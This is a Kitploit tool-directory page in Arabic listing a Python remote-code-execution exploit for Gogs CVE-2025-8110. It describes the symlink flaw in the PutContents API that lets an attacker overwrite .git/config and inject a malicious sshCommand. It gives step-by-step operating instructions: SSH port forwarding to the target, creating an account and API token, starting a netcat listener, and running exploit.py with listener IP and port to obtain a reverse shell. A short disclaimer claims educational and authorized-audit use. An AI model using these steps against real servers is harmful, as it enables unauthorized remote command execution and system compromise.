Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — استغلال RCE الخاص بـ Gogs CVE-2025-8110 | Kitploit
أدوات/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

استغلال RCE الخاص بـ Gogs CVE-2025-8110

عرض المستودع
111منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Gogs CVE-2025-8110 RCE Exploit

أداة استغلال آلية بلغة Python لـ CVE-2025-8110 في Gogs. تسمح هذه الثغرة بتنفيذ الأوامر عن بُعد (RCE) عن طريق استغلال واجهة برمجة التطبيقات PutContents، التي تفشل في التحقق مما إذا كان مسار الملف رابطًا رمزيًا. من خلال الكتابة فوق الملف الداخلي .git/config عبر رابط رمزي، يمكننا حقن أمر sshCommand ضار لتشغيل شل عكسية.

🛠️ المتطلبات الأساسية

تأكد من تثبيت Python 3 والاعتماديات اللازمة:

pip install requests rich beautifulsoup4

يجب أن يكون git مثبتًا ومتاحًا في $PATH الخاص بك لمرحلة استنساخ المستودع وتقديم التغييرات.

⚙️ الإعداد والتكوين

1. الوصول إلى واجهة الويب الخاصة بـ Gogs

قد يكون Gogs مرتبطًا بـ 127.0.0.1:3001. استخدم إعادة توجيه المنفذ للوصول إلى واجهة الويب محليًا:

ssh -L 3001:127.0.0.1:3001 user@target-ip

2. إنشاء حساب

بعد إعادة التوجيه، انتقل إلى http://localhost:3001:

  • أنشئ حسابًا جديدًا.
  • دوّن اسم المستخدم وكلمة المرور الخاصين بك لاستخدامها في البرنامج النصي.

3. إنشاء رمز واجهة برمجة التطبيقات (API Token)

يستخدم البرنامج النصي واجهة برمجة تطبيقات Gogs لتسليم الحمولة:

  1. سجل الدخول إلى واجهة الويب.
  2. انتقل إلى الإعدادات -> التطبيقات.
  3. ضمن إدارة رموز الوصول الشخصية، أنشئ رمزًا جديدًا.
  4. انسخ الرمز فورًا.

🚀 التنفيذ

1. تشغيل مستمع Netcat

شغّل المستمع الخاص بك قبل تشغيل البرنامج النصي، حيث يتم تشغيل الشل بمجرد معالجة تحديث واجهة برمجة التطبيقات.

nc -lvnp 5555

2. تشغيل الأداة

مرر بيانات اعتمادك والرمز كوسائط:

python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

الوسائط

Flagالوصف
-uعنوان URL الأساسي لنظام Gogs (مثل http://localhost:3001).
-unاسم المستخدم للحساب الذي أنشأته.
-pwكلمة مرور الحساب الذي أنشأته.
-tرمز واجهة برمجة التطبيقات الذي تم إنشاؤه في الإعدادات.
-lhعنوان IP الخاص بالمستمع (LHOST).
-lpمنفذ المستمع (LPORT).

ملاحظة: إذا توقف البرنامج النصي أو أعاد Read timed out بعد 'Overwriting .git/config'، فتحقق من المستمع. يشير هذا عادةً إلى أن الشل العكسية قد اتصلت بنجاح وتحمل الاتصال.


المؤلف: TYehan

إخلاء مسؤولية: هذه الأداة مخصصة للأغراض التعليمية والتدقيق الأمني المصرح به فقط. استخدمها بمسؤولية.

تنزيل الأداة